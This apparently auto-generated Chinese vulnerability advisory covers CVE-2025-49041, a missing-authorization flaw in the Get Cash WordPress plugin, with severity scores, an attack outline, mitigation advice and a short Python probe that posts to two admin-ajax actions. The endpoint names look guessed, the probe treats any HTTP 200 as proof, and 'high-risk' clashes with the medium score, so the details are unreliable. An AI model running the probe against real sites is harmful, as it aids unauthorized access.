CVE-2025-49041 CVSS 6.5 中危

CVE-2025-49041 WordPress Get Cash插件缺失授权漏洞

披露日期: 2025-12-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-49041

漏洞类型

缺失授权

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

The African Boss Get Cash WordPress插件

漏洞概述

CVE-2025-49041是WordPress Get Cash插件中的一个高危安全漏洞，CVSS评分6.5，属于中等严重程度。该漏洞存在于插件的访问控制机制中，由于缺少适当的授权检查，攻击者可以绕过身份验证，执行本应需要更高权限的操作。Get Cash插件是一款用于非洲地区的现金获取管理插件，被广泛应用于相关业务网站。此次漏洞影响范围涵盖从初始版本到3.2.3的所有版本，攻击者可利用此漏洞进行未授权的数据访问、配置修改等操作，对网站安全构成严重威胁。

技术细节

该漏洞的根本原因在于插件的多个端点缺乏必要的权限验证机制。攻击者通过构造特定的HTTP请求，可以直接访问管理功能而无需提供有效的认证凭证。漏洞主要影响插件的前端ajax处理函数和后端API接口，攻击者利用不安全的直接对象引用或缺少的current_user_can()检查，实现对敏感功能的未授权访问。

攻击链分析

STEP 1

步骤1

攻击者识别目标WordPress站点并确认Get Cash插件版本

STEP 2

步骤2

构造恶意请求绕过授权检查

STEP 3

步骤3

利用漏洞执行未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target = 'http://target-wordpress-site.com'

# 未授权访问插件管理功能
endpoints = [
    '/wp-admin/admin-ajax.php?action=get_cash_admin_action',
    '/wp-admin/admin-ajax.php?action=get_cash_config_update'
]

for endpoint in endpoints:
    url = f'{target}{endpoint}'
    response = requests.post(url, data={'key': 'value'})
    if response.status_code == 200:
        print(f'Vulnerable endpoint found: {endpoint}')

影响范围

Get Cash WordPress插件 <= 3.2.3

防御指南

临时缓解措施

在等待官方修复期间，可通过Web应用防火墙规则临时阻止恶意请求，或暂时禁用该插件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表